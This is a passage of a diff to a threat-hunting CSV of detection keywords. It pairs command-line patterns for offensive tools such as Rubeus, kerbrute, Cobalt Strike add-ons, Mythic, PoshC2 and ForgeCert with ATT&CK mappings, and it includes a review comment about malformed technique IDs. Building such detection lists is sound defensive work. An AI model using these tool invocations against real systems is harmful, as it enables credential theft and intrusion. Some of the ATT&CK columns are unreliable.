tools","https://github.com/screetsec/BruteSploit","1","0","N/A","N/A","7","666","261","2020-04-05T00:29:26Z","2017-05-31T17:00:51Z" +"* bruteuser *","offensive_tool_keyword","kerbrute","A tool to perform Kerberos pre-auth bruteforcing","T1110","TA0006","N/A","N/A","Credential Access","https://github.com/ropnop/kerbrute","1","0","N/A","N/A","10","2145","368","2023-08-10T00:25:23Z","2019-02-03T18:21:17Z" "* build Dent.go*","offensive_tool_keyword","cobaltstrike","A framework for creating COM-based bypasses utilizing vulnerabilities in Microsoft's WDAPT sensors.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - 
T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/optiv/Dent","1","0","N/A","10","10","296","51","2023-08-18T17:28:54Z","2021-05-03T14:00:29Z" "* -Build -NoAttackPaths*","offensive_tool_keyword","badazure","BadZure orchestrates the setup of Azure Active Directory tenants populating them with diverse entities while also introducing common security misconfigurations to create vulnerable tenants with multiple attack paths","T1583 - T1078.004 - T1095","TA0005 - TA0006 - TA0008","N/A","N/A","Exploitation Tools","https://github.com/mvelazc0/BadZure/","1","0","N/A","5","4","302","18","2023-07-27T15:40:41Z","2023-05-05T04:52:21Z" "* build_letmeout*","offensive_tool_keyword","cobaltstrike","Project to enumerate proxy configurations and generate shellcode from CobaltStrike","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - 
T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/EncodeGroup/AggressiveProxy","1","0","N/A","10","10","139","26","2020-11-04T16:08:11Z","2020-11-04T12:53:00Z" 
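Review bot: The `ruler` row rewritten in this hunk still carries `T1102.001 - T1201.001 - T1570.002` in the techniques column, and two of those IDs do not look like valid ATT&CK sub-techniques (T1201 and T1570 have no sub-techniques as far as I know), so anything that joins this column against ATT&CK for triage or coverage reporting will drop or mislabel the hit. Since the line is being touched anyway, I would correct the mapping to techniques that fit a `BruteForce(` keyword for an Exchange abuse tool, for example `"T1110 - T1137.003 - T1137.004 - T1137.005"`, to be confirmed against the ATT&CK software entry for Ruler. The same column looks inconsistent further down in this diff as well: the `Certipy` row separates IDs with bare spaces (`T1555 T1588 T1552`) and the `mythic` rows write sub-techniques with a hyphen (`T1573-001`), both of which a consumer splitting on ` - ` and matching the `Tnnnn.nnn` form would miss.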
@@ -240,14 +240,14 @@ "* BypassUac*.exe*","offensive_tool_keyword","cobaltstrike","Ladon is a large-scale intranet penetration tool. which can be modularized by PowerShell. plugged in CS. loaded in memory and has no file scanning","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/k8gege/Ladon","1","0","N/A","10","10","4238","827","2023-09-11T14:47:26Z","2019-11-02T06:22:41Z" "* -c * --choose-mutators * -s 1*","offensive_tool_keyword","Bashfuscator","A fully configurable and extendable Bash obfuscation framework","T1027 - T1027.004 - T1059 - T1059.004","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/Bashfuscator/Bashfuscator","1","0","N/A","10","10","1348","159","2023-09-05T10:40:25Z","2018-08-03T21:25:22Z" "* -c * -o payload.ser*","offensive_tool_keyword","pysoserial","Python-based proof-of-concept tool for generating payloads that utilize unsafe Java object deserialization.","T1556 - T1556.001 - T1556.002 - T1556.003 - T1557 - T1558 - T1573 - T1574","TA0003 - TA0004 - TA0005 - TA0006 - 
TA0008","N/A","N/A","shell spawning","https://github.com/aStrowxyu/Pysoserial","1","0","N/A","9","1","9","1","2021-12-06T07:41:55Z","2021-11-16T01:55:31Z" -"* -c *ExploitClass.cs*System.dll*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2723","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" +"* -c *ExploitClass.cs*System.dll*","offensive_tool_keyword","ysoserial.net","Deserialization payload generator for a variety of .NET formatters","T1059.007 - T1027.002 - T1059.001","TA0005 - TA0040","N/A","N/A","Exploitation Tools","https://github.com/pwntester/ysoserial.net","1","0","N/A","10","10","2726","442","2023-06-27T12:08:11Z","2017-09-18T17:48:08Z" "* -c *OBFUSCATION=*.ps1*","offensive_tool_keyword","GreatSCT","The project is called Great SCT (Great Scott). Great SCT is an open source project to generate application white list bypasses. This tool is intended for BOTH red and blue team.","T1055 - T1112 - T1189 - T1205","TA0005 - TA0006 - TA0008","N/A","N/A","Defense Evasion","https://github.com/GreatSCT/GreatSCT","1","0","N/A","N/A","10","1103","214","2021-02-10T22:05:27Z","2017-05-12T03:30:41Z" "* -c '/accepteula /s calc.exe' -e PsExec64.exe*","offensive_tool_keyword","pywsus","The main goal of this tool is to be a standalone implementation of a legitimate WSUS server which sends malicious responses to clients. 
The MITM attack itself should be done using other dedicated tools such as Bettercap.","T1505.003 - T1001.001 - T1560.001 - T1071.001","TA0003 - TA0011 - TA0002","N/A","N/A","Network Exploitation tools","https://github.com/GoSecure/pywsus","1","0","N/A","N/A","3","248","38","2022-11-11T19:59:21Z","2020-08-11T21:44:35Z" "* -c active_users -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -c all -d * --domaincontroller *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","124","2023-09-28T19:43:14Z","2021-07-12T17:07:04Z" +"* -c all -d * --domaincontroller *","offensive_tool_keyword","sharphound","C# Data Collector for BloodHound","T1057 - T1059 - T1053","TA0003 - TA0008 - TA0009","N/A","N/A","Reconnaissance","https://github.com/BloodHoundAD/SharpHound","1","0","N/A","N/A","5","440","125","2023-10-04T21:38:29Z","2021-07-12T17:07:04Z" "* -c command_exec --execute tasklist*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c command_exec --execute whoami*","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & 
Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -c CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","153","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" +"* -c CredEnum.c*","offensive_tool_keyword","cobaltstrike","Cobalt Strike Beacon Object Files","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - 
T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/guervild/BOFs","1","0","N/A","10","10","154","27","2022-05-02T16:59:24Z","2021-03-15T23:30:22Z" "* -c edr_query *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c logon_events * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c ls --directory * -u * -p *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" 
@@ -255,38 +255,38 @@ "* -c service_mod --execute create -s *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c upload --fileto * --file *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" "* -c vacant_system * -u *","offensive_tool_keyword","CIMplant","C# port of WMImplant which uses either CIM or WMI to query remote systems","T1047 - T1059.001 - T1021.006","TA0002 - TA0007 - TA0008","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/RedSiege/CIMplant","1","0","N/A","10","2","189","30","2021-07-14T18:18:42Z","2021-01-29T21:41:58Z" -"* -c -w *.txt -w *.txt --ss *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -w methods.txt -p 127.0.0.1*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -w users.txt --hs *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information 
Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -z file*users.txt -z file*pass.txt *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" -"* -c -z range*1-10 --hc=BBB http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5262","1327","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w *.txt -w *.txt --ss *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w methods.txt -p 127.0.0.1*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -w users.txt --hs *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -z file*users.txt -z file*pass.txt *","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" +"* -c -z range*1-10 --hc=BBB 
http*","offensive_tool_keyword","wfuzz","Web application fuzzer.","T1210.001 - T1190 - T1595","TA0007 - TA0002 - TA0010","N/A","N/A","Information Gathering","https://github.com/xmendez/wfuzz","1","0","N/A","9","10","5263","1326","2023-04-29T01:41:47Z","2014-10-22T21:23:49Z" "* C:\ProgramData\sh.txt*","offensive_tool_keyword","conti","Conti is a Ransomware-as-a-Service (RaaS) that was first observed in December 2019. Conti has been deployed via TrickBot and used against major corporations and government agencies particularly those in North America. As with other ransomware families - actors using Conti steal sensitive files and information from compromised networks and threaten to publish this data unless the ransom is paid","T1059.003 - T1486 - T1140 - T1083 - T1490 - T1106 - T1135 - T1027 - T1057 - T1055.001 - T1021.002 - T1018 - T1489 - T1016 - T1049 - T1080","TA0002 - TA0003 - TA0004 - TA0007 - TA0009 - TA0040","Conti Ransomware","Wizard Spider","Ransomware","https://www.securonix.com/blog/on-conti-ransomware-tradecraft-detection/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* C:\temp\w.log*","offensive_tool_keyword","SharpEfsPotato","Local privilege escalation from SeImpersonatePrivilege using EfsRpc.","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/bugch3ck/SharpEfsPotato","1","0","N/A","10","3","241","40","2022-10-17T12:35:06Z","2022-10-17T12:20:47Z" "* C:\Users\Public\build.bat*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\build.vbs*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" "* C:\Users\Public\DtcInstall.txt*","offensive_tool_keyword","Slackor","A Golang implant that uses Slack as a command and control server","T1059.003 - T1071.004 - T1562.001","TA0002 - TA0010 - TA0011","N/A","N/A","C2","https://github.com/Coalfire-Research/Slackor","1","0","N/A","10","10","451","108","2023-02-25T03:35:15Z","2019-06-18T16:01:37Z" -"* c2 add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"* c2 start http *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2490","383","2023-10-03T23:06:16Z","2018-07-05T02:09:59Z" -"* -c2server *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - 
HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1601","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" +"* c2 add *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* c2 start http *","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","0","N/A","10","10","2492","383","2023-10-04T15:37:48Z","2018-07-05T02:09:59Z" +"* -c2server *","offensive_tool_keyword","poshc2","keywords from poshc2 usage - a proxy aware C2 framework used to aid red teamers with post-exploitation and lateral movement.","T1548.002 - T1134.002 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560.001 - T1119 - T1110 - T1555 - T1482 - T1546.003 - T1068 - T1210 - T1083 - T1056.001 - T1046 - T1040 - T1003.001 - T1201 - T1069.001 - T1055 - T1090 - T1082 - T1016 - T1049 - T1007 - T1569.002 - T1552.001 - T1550.002 - T1047","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011","N/A","APT33 - HEXANE","C2","https://github.com/nettitude/PoshC2","1","0","N/A","10","10","1602","312","2023-09-08T05:42:06Z","2018-07-23T08:53:32Z" "* --CaCertPath *.pfx --CaCertPassword *","offensive_tool_keyword","ForgeCert","ForgeCert uses the BouncyCastle C# API and a stolen Certificate Authority (CA) certificate + private key to forge certificates for arbitrary users capable of authentication to Active 
Directory.","T1553.002 - T1136.003 - T1059.001","TA0006 - TA0002","N/A","N/A","Defense Evasion","https://github.com/GhostPack/ForgeCert","1","0","N/A","10","6","538","87","2022-10-07T18:18:09Z","2021-06-09T22:04:18Z" "* CallDirect.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" "* CallStranger.py*","offensive_tool_keyword","POC","Vulnerability checker for Callstranger (CVE-2020-12695). An attacker can use this vulnerability for Bypassing DLP for exfiltrating data. Using millions of Internet-facing UPnP device as source of amplified reflected TCP DDoS / SYN Flood? 
Scanning internal ports from Internet facing UPnP devices This script only simulates data exfiltration","T1046 - T1595 - T1587","TA0001 - TA0002 - TA0009","N/A","N/A","Exploitation tools","https://github.com/yunuscadirci/CallStranger","1","0","N/A","N/A","4","391","70","2021-08-07T16:48:55Z","2020-06-08T07:37:49Z" -"* -caplet *.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14623","1372","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" +"* -caplet *.cap","offensive_tool_keyword","bettercap","The Swiss Army knife for 802.11 - BLE - IPv4 and IPv6 networks reconnaissance and MITM attacks.","T1046 - T1190 - T1059 - T1053 - T1001.002 - T1110.001 - T1113 - T1132 - T1048","TA0010 - TA0001 - TA0002 - TA0003 - TA0005 - TA0006 - TA0009 - TA0011 - TA0010","N/A","N/A","Network Exploitation tools","https://github.com/bettercap/bettercap","1","0","N/A","N/A","10","14627","1373","2023-09-18T15:43:34Z","2018-01-07T15:30:41Z" "* cassandra-brute.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cassandra-info.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "* cccam-version.nse*","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A" -"* certipy-ad*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1765","243","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" -"* changepw * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
Full credit goes to Benjamin and Vincent for working out the hard components of weaponization- without their prior work this project would not exist.","T1558 - T1559 - T1078 - T1550","TA0002 - TA0003 - TA0007","N/A","N/A","Credential Access","https://github.com/GhostPack/Rubeus","1","0","N/A","N/A","10","3453","709","2023-09-25T09:48:31Z","2018-09-23T23:59:03Z" -"* charlotte.cpp*","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" -"* charlotte.dll *","offensive_tool_keyword","charlotte","c++ fully undetected shellcode launcher","T1055.012 - T1059.003 - T1027.002","TA0005 - TA0040","N/A","N/A","Defense Evasion","https://github.com/9emin1/charlotte","1","0","N/A","10","10","930","234","2021-06-11T04:44:18Z","2021-05-13T07:32:03Z" +"* certipy-ad*","offensive_tool_keyword","Certipy","Tool for Active Directory Certificate Services enumeration and abuse","T1555 T1588 T1552","N/A","N/A","N/A","Exploitation tools","https://github.com/ly4k/Certipy","1","0","N/A","10","10","1766","244","2023-09-26T00:51:47Z","2021-10-06T23:02:40Z" +"* changepw * /ticket:*","offensive_tool_keyword","Rubeus","Rubeus is a C# toolset for raw Kerberos interaction and abuses. It is heavily adapted from Benjamin Delpys Kekeo project (CC BY-NC-SA 4.0 license) and Vincent LE TOUXs MakeMeEnterpriseAdmin project (GPL v3.0 license). 
